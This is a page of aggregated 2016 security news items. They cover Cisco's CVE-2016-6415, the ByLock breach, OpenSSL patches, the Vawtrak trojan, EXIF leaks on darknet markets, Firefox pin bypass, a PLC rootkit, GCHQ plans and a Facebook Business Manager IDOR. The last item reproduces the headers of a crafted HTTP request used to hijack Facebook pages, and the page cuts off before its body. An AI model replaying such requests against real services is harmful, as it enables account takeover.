English Articles - Úvod  Odborné články  Bleskovky  Témata  List  EN  CZ  Seriály  Blogy  ČlánkyCZ

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


Cisco finds new Zero-Day Exploit linked to NSA Hackers
20.9.2016 THEHACKERNEWS Vulnerebility
Network equipment vendor Cisco is finally warning its customers of another zero-day vulnerability the company discovered in the trove of NSA's hacking exploits and implants leaked by the group calling itself "The Shadow Brokers."
Last month, the Shadow Brokers published firewall exploits, implants, and hacking tools allegedly stolen from the NSA's Equation Group, which was designed to target major vendors including, Cisco, Juniper, and Fortinet.
A hacking exploit, dubbed ExtraBacon, leveraged a zero-day vulnerability (CVE-2016-6366) resided in the Simple Network Management Protocol (SNMP) code of Cisco ASA software that could allow remote attackers to cause a reload of the affected system or execute malicious code.
Now Cisco has found another zero-day exploit, dubbed "Benigncertain," which targets PIX firewalls.
Cisco analyzed the exploit and noted that it had not identified any new flaws related to this exploit in its current products.
But, further analysis of Benigncertain revealed that the exploit also affects Cisco products running IOS, IOS XE and IOS XR software.
Benigncertain leveraged the vulnerability (CVE-2016-6415) that resides in the IKEv1 packet processing code and affects several Cisco devices running IOS operating system and all Cisco PIX firewalls.
IKE (Internet Key Exchange) is a protocol used for firewalls, to provide virtual private networks (VPNs), and even manage industrial control systems.
A remote, unauthorized attacker could use this vulnerability to retrieve memory contents from traffic and disclose critical information such as RSA private keys and configuration information by sending specially crafted IKEv1 packets to affected devices.
"The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests," Cisco said in its advisory.
Cisco's IOS operating system XR versions 4.3.x, 5.0.x, 5.1.x and 5.2.x, as well as PIX firewalls versions 6.x and earlier, are vulnerable to this flaw, though the company has not supported PIX since 2009.
Neither Cisco has developed a patch for the flaw, nor any workarounds are available.
The company said the vulnerability is currently under exploit, advising its customers to employ intrusion detection system (IDS) and intrusion prevention systems (IPS) to help stop the attacks.
Cisco promised to release software updates to patch CVE-2016-6415 but did not specify a time frame.

How an insecure messaging app led to fall of a terrorist organization in Turkey?
20.9.2016 securityaffairs Cyber

MIT (Turkish Intelligence Agency) has hacked one-single server of a messaging app in Lithuania in order to identify members of an Islamic terrorist group.
Within the harshness of political controversies turned up in Turkey with the recent coup attempt at July of 15th [1], it seems that a cyberwar between MIT [2] (Turkish National Intelligence Agency) and FETO [3] ended up revealing all key member names to the government authorities.

It all started with the release of a mobile messaging app called ByLock which seemed as a simple, ordinary messaging solution with offline mail and online voice calling capabilities developed by a guy named David Keynes from Oregon. But later on, it is understood that there is no one named as mentioned and it was a work of an illegal organization to move its whole daily communication to the underground.

Despite the “next generation of secure communication” slogan on the homepage of ByLock -which is still live at https://bylockapp.wordpress.com/- after months of the release of the application it took attention of MIT due to popularity among FETO members and it was easily decompiled into the pieces and pointed out to a server in Lithuania that all messages, passwords and ip addresses stored in plaintext.

messaging app hacked by MIT

After the hack of a server in Lithuania, security experts downloaded nearly 3.5 million messages revealing ~53000 thousand people relating to the illegal organization. It was a breach which gave a big advantage to the Turkish authorities in the mid of 2015 and after the failed coup attempt.

But this is not the end of the story. Recently, the head of “Ministry of Science, Technology and Industry”, Faruk Ozlu has revealed that there were suspicions that ByLock was the product of the secret members of FETO who were working in TUBITAK [4] (The Scientific And Technological Research Council Of Turkey). “Our investigations are still ongoing in TUBITAK and we are categorizing suspected people in 5 categories. We have taken out their jobs whom are found within 4. and 5. Category by others in 3 categories are getting checked out for evidences.” said Ozlu in September 9 to AA (Anatolian News Agency).

These news with TUBITAK are revealed footprints about another struggle which has been resulted with the wiretaps leaked in 2013 containing Tayyip Erdogan’s conversations [5] on crypto-phones developed by TUBITAK which later denied and called ‘fake’ by the authorities.


[1] https://en.wikipedia.org/wiki/2016_Turkish_coup_d%27%C3%A9tat_attempt

[2] http://mit.gov.tr

[3] https://en.wikipedia.org/wiki/G%C3%BClen_movement

[4] http://tubitak.gov.tr/en

[5] http://www.ibtimes.com/are-erdogan-corruption-tapes-real-1558185

OpenSSL will patch this week high severity vulnerability
20.9.2016 securityaffairs Vulnerebility

The OpenSSL Project announced early this week that it will release as soon as possible updates to that patch multiple vulnerabilities.
One of the flaws that affect the popular toolkit has a “high” severity.

The Project plans to release OpenSSL versions 1.1.0a, 1.0.2i and 1.0.1u next Thursday. The OpenSSL Project confirmed that the security updates that will be released on September 22 will fix a flaw having a high severity, one having a moderate severity, meanwhile, the remaining ones have all low severity.

The time to fix a flaw depends on its severity, usually high severity issues are fixed within a month by experts at the OpenSSL Project, meanwhile, critical issues are fixed as soon as possible to avoid exploitation in the wild.

The OpenSSL Project has once again reminded users that support for version 1.0.1 will end on December 31. The 1.1.0 branch was launched on August 25.

The OpenSSL Project has already issued three security patches this year that addressed a total of 16 vulnerabilities.

In May, the OpenSSL project fixed the CVE-2016-2107 flaw that affected the open-source cryptographic library and could be exploited to launch a man-in-the-middle attack leveraging on the ‘Padding Oracle Attack’ that can decrypt HTTPS traffic if the connection uses AES-CBC cipher and the server supports AES-NI.

According to the experts, the flaw was affecting the OpenSSL cryptographic library since 2013, when maintainers of the project fixed another Padding Oracle flaw called Lucky 13.

“A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server support AES-NI.” states the advisory issued by the OpenSSL. “This issue was introduced as part of the fix for Lucky 13 padding attack (CVE-2013-0169). The padding check was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes.”

According to the security firm High-Tech Bridge, on May 31th many of the Alexa Top 10,000 websites were still vulnerable to the OpenSSL flaw CVE-2016-2107 despite the OpensSSL Project issued the fix on May 1st.

CVE-2016-2107 OpenSSL Flaw

Earlier this year the OpenSSL Project released versions 1.0.2f and 1.0.1r to fix a high-severity vulnerability (CVE-2016-0701) that allows attackers to decrypt secure traffic. The developers also patched two separate vulnerabilities in the toolkit, the most severe affected the implementations of the Diffie-Hellman key exchange algorithm presents only in OpenSSL version 1.0.2.

Another round of security updates released in March fixed vulnerabilities, including the DROWN flaw that could be exploited by attackers to access users’ sensitive data over secure HTTPS communications. In March, security experts estimated that the DROWN vulnerabilities affected a quarter of the top one million HTTPS domains and one-third of all HTTPS websites at the time of disclosure.

Vawtrak v2, a close look at the cybercriminal groups behind the threat
19.9.2016 securityaffairs Crime

Security experts from the cyber threat intelligence firm Blueliv have published a report on the banking Trojan Vawtrak v2 its criminal ecosystem.
Security experts from the cyber threat intelligence firm Blueliv have conducted a technical investigation on the banking Trojan Vawtrak v2 and activities of the cybercriminal groups behind the threat.

Vawtrak is a threat that has been in the wild since 2014 when experts at Trend Micro spotted the threat that was targeting Japanese Internet users. The first variant of BKDR_VAWTRAK abused a Windows feature called Software Restriction Policies (SRP) to prevent victims’ systems from running a wide range of security programs

We saw several versions of the malware over the years, the last variant of Vawtrak was discovered this summer by experts from Fidelis firm. The new version of the Vawtrak banking Trojan included significant improvements such as the SSL pinning.

Researchers from Blueliv now have conducted a reverse engineering of the Vawtrak banking Trojan that confirmed the presence of two clearly differentiated infrastructures. One infrastructure dedicated exclusively to malware distribution (primarily spam), and a second one used for maintenance, control and the reporting of stolen data.

The analysis of the Vawtrak v2 revealed a complex infrastructure used to deliver the malware as well as other Trojans. Blueliv named the cybercriminal group behind this infrastructure Moskalvzapoe.

Moskalvzapoe uses several servers hosting command and control (C2) for Vawtrak and other Trojans (i.e. Pony credential stealer). The threat is primary spread through spamming and drive-by download mechanisms that involved Exploit Kits (mostly Nuclear EK).

vawtrak v2

The Moskalvzapoe infrastructure presents an unusual network topology in terms of the way crooks have set up C&C servers and how they rotate their domains and exposed IPs.

“All these hosts forward all the incoming connections towards the back-end.” reads the analysis from BlueLiv. “The Trojans dropped by the loaders are usually found in compromised servers which share multiple characteristics including geolocation. Most of the compromised hosts can be found in Russia. Usually these hosts are compromised using security vulnerabilities found in commonly used software such as WordPress, Joombla, or Bitrix. Furthermore, the deployment of Pony Grabber, the credential-stealing malware, enables them access to other hosts and services.”

The Vawtrak V2 is able to implement further actions by using additional modules, significantly expanding its capabilities. These most common modules used by the banking Trojan are:

Steal credentials from various applications installed in the host.
Provide the attackers with remote access.
Use the host as a proxy.
Steal certi­ficates.
Log the user´s keystrokes.
Webinject module.
The largest number of Vawtrak v2 infections was observed US (69,010), followed by Canada (6,777) and UK (969), meanwhile, the impact on Europe was minimal.

“The total amount of data exfiltrated by the botnet is more than 2,500,000 credentials. The fact that U.S. is the most affected country is also reflected in the most affected services.” reads the report published by BlueLiv.

The analysis published by BlueLive revealed the use of large-scale communication networks that increased in a significant way the level of sophistication of the criminal infrastructures to support the distribution of Vawtrak V2 worldwide.

The data emerged from the report shows the amazing abilities of cybercrime groups which have complex hierarchies and the availability of an efficient business model.

I suggest the reading of the report titled “Chasing cybercrime: Network insights into Vawtrak v2” that is full of interesting data on the malware and the threat actors behind it.

Blueliv also provided Indicators of Compromise (IOCs) that could be used by organizations to detect the threat.

Boffins analyzed EXIF metadata in photos on principal blackmarkets
19.9.2016 securityaffairs Crime

Two researchers have analyzed images Exif metadata included in the photos used by crooks to advertise their products on black marketplaces in the dark web.
Darknets are a privileged environment for crooks that intend to develop a prolific business protecting their anonymity, anyway, there are several aspects that they need to consider in order to leave tracks that could allow their identification.

In the past the analysis of EXIF metadata allowed law enforcement and intelligence agencies to track suspects, but now cyber criminals, including sellers in the principal black markets, have started to metadata the photos they posted. The trend was confirmed by a study conducted by two students at the Harvard University, Paul Lisker and Michael Rose.

“Our goal was to leverage a longitudinal archive of dark net markets (DNMs) to collect and analyze sale listing images with metadata containing location data.” the students explained in a post.

What is EXIF metadata?

“Exchangeable image file format (officially Exif, according to JEIDA/JEITA/CIPA specifications) is a standard that specifies the formats for images, sound, and ancillary tags used by digital cameras (including smartphones), scanners and other systems handling image and sound files recorded by digital cameras.” reads Wikipedia.

Basically, every image took with a digital camera or a mobile device includes information, in the EXIF standard, such as the device used and the location of the shot. That data are written in the “exchangeable image file format” (EXIF) standard.

Paul Lisker and Michael Rose analyzed images of drugs and weapons used by crooks to advertise their product and services on black marketplaces in the dark web and saved them to a data repository maintained by an independent security researcher Gwern Branwen.

The archive is very interesting for security experts that intend to study the activities in the dark web, it includes data from some 83 dark markets and 40 associated forums. Information was collected from 2013 to 2015, totalling 44 million files or 1.5Tb of data.

“From 2013-2015, I scraped/mirrored on a weekly or daily basis all existing English-language DNMs as part of my research into their usage, lifetimes/characteristics, & legal riskiness; these scrapes covered vendor pages, feedback, images, etc. In addition, I made or obtained copies of as many other datasets & documents related to the DNMs as I could. This uniquely comprehensive collection is now publicly released as a 50GB (~1.6TB uncompressed) collection covering 89 DNMs & 37+ related forums, representing <4,438 mirrors, and is available for any research. This page documents the download, contents, interpretation, and technical methods behind the scrapes.” wrote Branwen.

The experts used bash scripts to search for EXIF data including longitude and latitude data among the images in the archive.

“In order to analyze the listing images inside each archive, we first searched for and compiled a list of the file path of all JPEG images to ensure that no file went untested. (Images used for listings were only in the JPEG format; any other image formats — PNG, GIF, etc. — were used for website graphics.) Then, using Python and bash scripts, we checked each image’s EXIF data for longitude or latitude data, saving the coordinates for each geotagged photo and its file path to a text file.” explained the student.

The experts found 229 unique images that contained geolocation data that would reference the location of the shot within a range of two kilometres.

The duo analysed roughly 223,471 unique dark market images, the vast majority don’t include the EXIF data.

“Out of these markets and forums, we located 2,276 total geotagged images, which after eliminating duplicates available over multiple days, gave 229 total unique images with associated coordinates. The coordinates—with decimals removed from the numbers to protect privacy—can be seen plotted in the map below. (The coordinates may be up to about one mile away from their true location.)” states the duo.

Data from lisker.silk.co
“In total, we analyzed 7,522,284 images from the entire DNM archive, representing 223,471* unique photos. Table 1 presents a summary of markets containing geotagged images:”


Most popular black markets like Agora stripped metadata from images published in the adv. In the case of Agora, the researchers noticed that EXIF metadata was absent on all images after 18 March 2014.

Agora marketplace 2

Below the conclusions of the study, the researchers highlighted that sellers and dark market websites are failing to remove EXIF metadata from images.

“First, it was common in many cases to observe sites, typically residential, surrounded by 5–10 tagged images separated by a few meters,” the students explained in a post.

“This suggests the behavior of sellers who are careless on a regular basis, rather than the occasional forgetfulness of not stripping data or purposeful manipulation.

“We also found several instances of these clusters incorporating listings on multiple sites, pointing to sellers with activities across the darknet and failing to strip their products’ location on any of the sites up.”

Firefox Browser vulnerable to Man-in-the-Middle Attack
19.9.2016 thehackernews Vulnerebility
A critical vulnerability resides in the fully-patched version of the Mozilla's Firefox browser that could allow well-resourced attackers to launch man-in-the-middle (MITM) impersonation attacks and also affects the Tor anonymity network.
The Tor Project patched the issue in the browser's HTTPS certificate pinning system on Friday with the release of its Tor Browser version 6.0.5, while Mozilla still has to patch the critical flaw in Firefox.
Attackers can deliver Fake Tor and Firefox Add-on Updates
The vulnerability could allow a man-in-the-middle attacker who is able to obtain a forged certificate for addons.mozilla.org to impersonate Mozilla servers and as a result, deliver a malicious update for NoScript, HTTPS Everywhere or other Firefox extensions installed on a targeted computer.
"This could lead to arbitrary code execution [vulnerability]," Tor officials warned in an advisory. "Moreover, other built-in certificate pinnings are affected as well."
Although it would be challenging to obtain a fraudulent certificate for addons.mozilla.org from any one of several hundred Firefox-trusted certificate authorities (CAs), it is within reach of powerful nation states attackers.
The vulnerability was initially discovered Tuesday by a security expert that goes by the name of @movrcx, who described the attacks against Tor, estimating attackers would need US$100,000 to launch the multi-platform attacks.
Actual Issue resides in Firefox's Certificate Pinning Procedure
However, according to a report posted Thursday by independent security researcher Ryan Duff, this issue also affects Firefox stable versions, although a nightly build version rolled out on September 4 is not susceptible.
Duff said the actual problem resides in Firefox's custom method for handling "Certificate Pinning," which is different from the IETF-approved HPKP (HTTP Public Key Pinning) standard.
Certificate Pinning is an HTTPS feature that makes sure the user's browser accepts only a specific certificate key for a particular domain or subdomain and rejects all others, preventing the user from being a victim of an attack made by spoofing the SSL certs.
While not very popular, HPKP standard is often used on websites that handle sensitive information.
"Firefox uses its own static key pinning method for its own Mozilla certifications instead of using HPKP," says Duff. "The enforcement of the static method appears to be much weaker than the HPKP method and is flawed to the point that it is bypassable in this attack scenario."
Mozilla is scheduled to release Firefox 49 on September 20, so the team has enough time to deliver a fix. The Tor Project took just one day to address the flaw after the bug's disclosure went online.
Users of Tor Browser should update to version 6.0.5, while Firefox users should disable automatic add-on updates, a default feature in the browser, or should consider using a different browser until Mozilla releases the update.

CVE-2016-6415 – CISCO confirms a new Zero-Day linked to Equation Group hack
19.9.2016 securityaffairs Vulnerebility
Cisco revealed the existence of another zero-day vulnerability, tracked as CVE-2016-6415, in the Equation Group archive leaked by the Shadow Broker hackers.
This summer a group of hackers known as Shadow Brokers hacked into the arsenal of the NSA-linked group Equation Group and leaked roughly 300 Mb of exploits, implants, and hacking tools.

The existence of the Equation Group was revealed in February 2015 by security researchers at Kaspersky. The alleged nation-state actor has been operating since 2001 and targeted practically every industry with sophisticated zero-day exploits.

According to a report from Kaspersky Lab, the Equation Group combined sophisticated and complex Tactics, Techniques, and Procedures. The experts at Kaspersky speculated that the Equation Group had interacted with operators behind Stuxnet and Flame. Based on the elements collected in the various cyber espionage campaigns across the years, the experts hypothesized that the National Security Agency (NSA) could be linked to the Equation Group.

After Shadow Brokers leaked the archive online, major vendors like CISCO, Juniper, and Fortinet analyzed their systems in order to find the vulnerabilities exploited by the Equation Group’ exploits and fix them.

CISCO, for example, discovered in the arsenal a tool dubbed EXTRABACON that was able to hack into CISCO ASA boxes.

The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall. The EXTRABACON tool leverages on a flaw that resides in the Simple Network Management Protocol (SNMP) implemented by the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

At the end of August CISCO started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.

The analysis of material leaked online revealed the existence of another exploit dubbed BENIGNCERTAIN that allows the extraction of VPN passwords from certain Cisco devices.

The expert Mustafa Al-Bassam who analyzed the data dump has called the attack “PixPocket” after the name of the Cisco products hacked by the tool, the Cisco PIX.

The CISCO PIX product family was declared phase out back in 2009, but it is widely adopted by government entities and enterprises.

According to the expert, the tool works against the CISCO PIX versions 5.2(9) up to 6.3(4). According to Cisco, the exploit does not affect PIX versions 7.0 and later, the IT giant confirmed on August 19 that it had not identified any new flaws linked to the BENIGNCERTAIN exploit.

Unfortunately, further analysis revealed that the flaw exploited by the BENIGNCERTAIN, tracked as CVE-2016-6415, also affects products running IOS, IOS XE and IOS XR software.

The CVE-2016-6415 resides in the IKEv1 packet processing code. A remote, unauthenticated attacker could exploit it retrieve memory contents.

“The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests,” reads the security advisory published by Cisco.

The flaw affects Cisco IOS XR versions 4.3.x, 5.0.x, 5.1.x and 5.2.x – versions 5.3.0 and later are not impacted. All IOS XE releases and various versions of IOS are affected.

CISCO confirmed that all the firewalls belonging to the PIX family and all the products running affected versions of IOS, IOS XE and IOS XR are vulnerable if they are configured to use IKEv1.

CVE-2016-6415 cisco-ios-xr

The bad new is CISCO is aware of cyber attacks against some customers trying to exploit the vulnerability.

Waiting for security patches for CVE-2016-6415, CISCO has published indicators of compromise (IoC) and urge its customers to protect vulnerable products with IPS and IDS solutions.

“This vulnerability can only be exploited by IKEv1 traffic being processed by a device configured for IKEv1. Transit IKEv1 traffic can not trigger this vulnerability. IKEv2 is not affected,” Cisco said. “Spoofing of packets that could exploit this vulnerability is limited because the attacker needs to either receive or have access to the initial response from the vulnerable device.”

NIST issues the Baldrige Cybersecurity Excellence Builder cybersecurity self-assessment tool
19.9.2016 securityaffairs Security
The National Institute of Standards and Technology (NIST) has issued a draft of a self-assessment tool named Baldrige Cybersecurity Excellence Builder.
The tool is based on the Baldrige Performance Excellence Program and the risk management mechanisms of NIST cybersecurity framework.

The Baldrige Cybersecurity Excellence Builder was designed to help enterprises to measure the effectiveness of their implementation of the cybersecurity framework and improve the risk management.

“The builder will strengthen the already powerful cybersecurity framework so that organizations can better manage their cybersecurity risks,” said Commerce Deputy Secretary Bruce Andrews that presented the tool at an Internet Security Alliance conference.

The development of the draft of the Baldrige Cybersecurity Excellence Builder is the result of a the collaboration between NIST and the Office of Management and Budget(link is external)’s Office of Electronic Government and Information Technology(link is external), with input from private sector representatives.


The Baldrige Cybersecurity Excellence Builder tool was devised to help organizations ensure that their cybersecurity program (systems and processes) supports their activities and functions.

“These decisions around cybersecurity are going to impact your organization and what it does and how it does it,” says Robert Fangmeyer, director of the Baldrige Performance Excellence Program. “If your cybersecurity operations and approaches aren’t integrated into your larger strategy, aren’t integrated into your workforce development efforts, aren’t integrated into the results of the things you track for your organization and overall performance, then they’re not likely to be effective.”

The NIST explained that the use of the Baldrige Cybersecurity Excellence Builder tool allows organizations of any size and type to:

Identify cybersecurity-related activities that are critical to business strategy and the delivery of critical services;
Prioritize investments in managing cybersecurity risk;
Assess the effectiveness and efficiency in using cybersecurity standards, guidelines and practices;
Evaluate their cybersecurity results; and
Identify priorities for improvement.
The Builder guides users through a process that details their organization’s distinctive characteristics and strategic situations related to cybersecurity. Then, a series of questions helps define the organization’s current approaches to cybersecurity in the areas of leadership, strategy, customers, workforce and operations, as well as the results achieved with them.

The approach behind the Baldrige Cybersecurity Excellence Builder is simple, the tool uses a series of questions that help the organizations assess their strategies tied to the cybersecurity. The areas assessed by the survey leadership, strategy, customers, workforce, and operations.

As a last step of the assessment, a rubric lets users evaluating the cybersecurity maturity level of their organization.

“The tool’s assessment rubric helps users determine whether their organization’s cybersecurity maturity level is reactive, early, mature or a role model, according to NIST. The completed evaluation can lead to an action plan for upgrading cybersecurity practices and management and implementing those improvements.” reads the announcement published by the NIST. “It also can measure the progress and effectiveness of the process. NIST recommends organizations use the builder periodically so they can maintain the highest level of cybersecurity readiness.”

Hacking industrial processes with and undetectable PLC Rootkit
19.9.2016 securityaffairs Virus

Two security researchers have developed an undetectable PLC rootkit that will present at the upcoming Black Hat Europe 2016.
The energy industry is under unceasing attack, cyber criminals, and state-sponsored hackers continue to target the systems of the companies in the sector.
The Stuxnet case has demonstrated to the IT community the danger of cyber attacks, threat actors could spread a malicious code to interfere with processes inside a critical infrastructure.
A new attack to be revealed at Black Hat Europe conference silently overtakes industrial network processes.
The security researcher Ali Abbasi, a Ph.D. candidate in the distributed and embedded system security group at University of Twente, Netherlands, and Majid Hashemi, an independent security researcher, have developed an undetectable PLC rootkit. The security duo will present the undetectable PLC rootkit at the upcoming Black Hat Europe, that will be held in London in November.

The security duo will also present a version of the PLC attack that leverages shellcode. The title of the presentation if Ghost In The PLC: Designing An Undetectable Programmable Logic Controller Rootkit.

PLC rootkit

The researchers believe that their PLC rootkit could be dangerous more than Stuxnet because it is stealth and affects directly the PLC differently from Stuxnet that was designed to target SCADA systems running on Windows architecture.It’s much less likely to be discovered because it sits at the lower-level of the system.

The PLC rootkit was developed to compromise the low-level components of a PLC system, it could be considered a cross-platform PLC threat because it is able to infect PLC manufactured by almost any vendor.

“It’s a race to the bottom” Abbasi told DarkReading. “Everybody has access to higher-level [SCADA operations]. Attackers in the future will go to lower level assaults” such as this to evade detection, he says.

Hacking a PLC system directly could more simple for Vxers because such kind of devices don’t implement many detection mechanisms, this means that a PLC running a real-time operating system could me more exposed to cyber attacks.

In August, a group of researcher presented at the Black Hat USA presented a PLC worm that spreads among PLCs, it was dubbed by the creator PLC-Blaster.

Abbasi and Hashemi explained their PLC rootkit doesn’t target the PLC logic code like other similar threats making hard its detection.

Furthermore, the researchers explained that the activity of the PLC rootkit will go unnoticed even to systems that monitor the power consumption of the PLC.

“The overhead imposed of our attack outside of kernel is below one percent, which means even those approaches which monitor the power usage of PLC for attack detection will be useless,” explained Abbasi.

The malware interferes with the connection between PLC runtime and logic with the I/O peripherals. The malware resides in the dynamic memory of the industrial component and manipulates the I/O and PLC process, while the PLC is communicating with I/O block composed of output pins that handle the physical control of the process.

The PLC receives signals from the field from the input PINs (i.e. level of the liquid in a pipe) and controls the process through actuators that receive instructions from the output PINs of the PLC (i.e. control of a valve).

Clearly manipulating the I/O signals it is possible to interfere with industrial process in a stealthy way, and this is what the PLC rootkit does.

“Our attack instead targets the relation between PLC runtime and logic with the I/O peripherals of it. In our attack, the PLC logic and PLC runtime remain intact,” said Abbasi. ” “in PLCs, the I/O operations are one of the most important tasks.”

As explained by the duo, the attack is feasible due to lack of hardware interrupt on the PLC’s SoC and intensified by Pin Control subsystem inability for hardware level Pin Configuration detection.

Abbasi and Hashemi are currently studying defensive countermeasures to detect and protect PLCs from such kind of threats.

Mozilla will fix the cross-platform RCE flaw that threatened Tor anonymity
18.9.2016 securityaffairs Vulnerebility

Mozilla plans to fix the cross-platform RCE flaw that threatened Tor anonymity. The flaw affects certificate pinning protections implemented by Mozilla.
Mozilla plans to release a Firefox update to address the cross-platform remote code-execution vulnerability recently patched in the Tor browser.

The tor is inviting its users to install the security update urgently, and Mozilla follows close behind as soon as possible.

Mozilla will release the fix next Tuesday, the flaw could be exploited by attackers to launch a man-in-the-middle attack by impersonating Mozilla servers through forged certificate.

mozilla firefox

According to the TorProject, once the attacker is in the position to launch a MiTM and he is able to forge a single TLS certificate for addons.mozilla.org, he could inject in the traffic malicious update for NoScript or many other Firefox extensions installed on a targeted computer.

“I spent a decent portion of my day looking into the claim by the Tor-Fork developer that you could get cross-platform RCE on Tor Browser if you’re able to both MitM a connection and forge a single TLS certificate for addons.mozilla.org. This is well within the capability of any decently resourced nation-state.” wrote the researcher Ryan Duff.

The fake certificate would have to be issued by any one of several Firefox-trusted certificate authorities (CA).

Such kind of attack is not easy to carry on for a common attacker that would be able to forge a certificate for addons.mozilla.org.

Anyway, there is the concrete risk that a nation-state actor or a persistent attacker could exploit the vulnerability to launch an attack and eavesdrop protected traffic or de-anonymize Tor users.

Persistent attackers could target a CA with the specific intent of forging counterfeit digital certificates. In 2011, hackers alleged linked to the Iranian Government hacked the Dutch CA DigiNotar and issued forged certificates for more hundred of domains, including the Mozilla add-ons subdomain

The security researcher Ryan Duff explained that production versions of Firefox are affected by the flaw, anyway, a nightly build version released on September 4 is not vulnerable.

“Firefox uses its own static key pinning method for it’s own Mozilla certs instead of using HPKP. The enforcement of the static method appears to be much weaker than the HPKP method and is flawed to the point that it is bypassable in this attack scenario. The bug appears to be fixed as of the September 4th nightly build of Firefox but is obviously still unpatched in both the current production versions of Firefox and Tor Browser.” added Duff.

Duff analyzed the cross-platform RCE and reproduced the hack described by the researcher @movrcx, which define himself as and “anti-torcorp insurgent.” @movrcx explained in his analysis titled “Tor Browser Exposed: Anti-Privacy Implantation at Mass Scale” that the “certificate pinning” mechanism implemented by Firefox was ineffective against the attack described in this post.

Duff highlighted that the problem is related the implementation of a static key pinning that is not based on the HTTP Public Key Pinning protocol.

“We investigated this and a fix will be issued in the next Firefox release on Tuesday, September 20. We had fixed an issue with the broken automation on the Developer Edition on September 4, but a certificate pinning had expired for users of our Release and Extended Support Release versions.” reads a statement issued by Mozilla. “We will be turning on HPKP on the addons.mozilla.org server itself so that users will remain protected once they have visited the site even if the built-in pins expire. We will be changing our internal processes so built-in certificate pins do not expire prematurely in future releases.”

Waiting for an update, users should consider stopping automatically accepting extension updates.

GCHQ plans to protect the country with a national firewall
18.9.2016 securityaffairs Security

The British intelligence agency GCHQ is planning to create to protect the country from cyber attacks by creating a national firewall.
The news was announced, during the Billington CyberSecurity Summit held in Washington DC, by the GCHQ director general of cyber security Ciaran Martin.

The British GCHQ recently created the National Cyber Security Centre, led by Martin, that has the task to protect national infrastructure from attacks originated on the Internet.

“The NCSC will be based in London and will open in October. Ciaran Martin, currently Director General Cyber at GCHQ will lead it. Dr Ian Levy, currently Technical Director of Cyber Security at GCHQ, will join the organisation as Technical Director.” reads a press release issued by the UK Government.

“The UK faces a growing threat of cyber-attacks from states, serious crime gangs, hacking groups as well as terrorists. The NCSC will help ensure that the people, public and private sector organisations and the critical national infrastructure of the UK are safer online.”

gchq MPs emails

In March 2016, then Minister for the Cabinet Office, Matt Hancock highlighted the importance of the Centre.

“It will be the authoritative voice on information security in the UK and one of its first tasks will be to work with the Bank of England to produce advice for the financial sector for managing cyber security effectively.” said Hancock.

“Martin used the term “flagship project” while he was describing the plans of the GCHQ about the national firewall. The infrastructure will protect government websites and national security agencies from hackers.

The national firewall would be used by government agencies and internet service providers to repel cyber threats.

“What better way of providing automated defences at scale than by the major private providers effectively blocking their customers from coming into contact with known malware and bad addresses?” Martin said during his speech

The National Cyber Security Centre will start its activities next month, it represent of the pillars of the cyber strategy of the UK Government as announced last year by the former Chancellor Mr Osborne.

Osborne also announced the plans of the Government to almost double the cybersecurity budget to £1.9 billion for the years 2016 – 2021.

The UK Government will also add 1,900 new professionals to the National intelligence agencies.

“In the Spending Review, I have made a provision to almost double our investment to protect Britain from cyber attack and develop our sovereign capabilities in cyberspace, totalling £1.9 billion over five years. If you add the spending on core cyber security capabilities government protecting our own networks and ensuring safe and secure online services, the government’s total cyber spending will be more than £3.2 billion.” said Osborne.

Cyber security is crucial for any government, the number of “national security level cyber incidents” in the last year is almost doubled, the intelligence agency now detects about 200 serious incidents every month aimed to disrupt national infrastructure and services.

Cyber attacks are asymmetric and instantaneous, difficult to repel without the aid of a new generation of tools.

The National Cyber Security Centre also has plans to design a new generation of automated defense systems to neutralise a large number of attacks having a low level of sophistication, such as phishing attacks spoofing government email addresses to target members of the public.

“We trialled it, and whoever was sending 58,000 malicious emails per day from taxrefund@gov.uk isn’t doing it anymore,” added Martin.

Hacking Facebook pages? Hackers demonstrated how to do it in 10 secs
18.9.2016 securityaffairs Hacking

Hacking Facebook – An Indian researcher discovered a critical vulnerability in the Facebook business manager that could be exploited to hack any Page.
The Indian security researcher Arun Sureshkumar reported a critical vulnerability in the Facebook business manager that could be exploited by attackers to hack any Facebook page.

The Business Manager is the component that allows businesses to share and control access to assets on Facebook, including Pages and Ad accounts.

Facebook Business Manager also allows administrators to share access to Pages and ad accounts without being friends with coworkers on Facebook.

Before analyze the technique devised by the researcher let me introduce you the concept of Insecure Direct Object Reference.

According to the definition provided by the OWASP project, the Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, an attacker can bypass authorization and access resources in the system directly.

“Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.” reads the OWASP.

Sureshkumar exploited an IDOR vulnerability in the Facebook Business Manager that allowed him to take over any Facebook page in less than 10 seconds.

Sureshkumar used his Facebook business account (ID =907970555981524) to add a partner. He used as a partner a test account with ID 991079870975788.

The hacker used Burp Suite to capture the request using Burp Suite, the tool allowed him to modify the request.

Below the request published by the hacker in a blog post:

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1

Host: business.facebook.com

Connection: close

Content-Length: 436

Origin: https://business.facebook.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524

